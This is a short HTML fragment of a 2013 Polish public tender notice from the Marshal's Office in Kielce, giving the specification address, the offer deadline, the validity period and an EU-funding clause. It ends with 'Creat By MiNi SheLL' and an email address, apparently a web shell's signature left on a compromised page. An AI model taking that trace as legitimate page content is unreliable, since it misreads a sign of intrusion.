<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach, 
al. IX Wieków Kielc 3, 25-516 Kielce, 
Budynek C-2, pokój 346 (III piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2013 godzina 11:00, miejsce: Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach, 
al. IX Wieków Kielc 3, 25-516 Kielce, 
Budynek C-2, pokój 147 (Kancelaria Ogólna, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com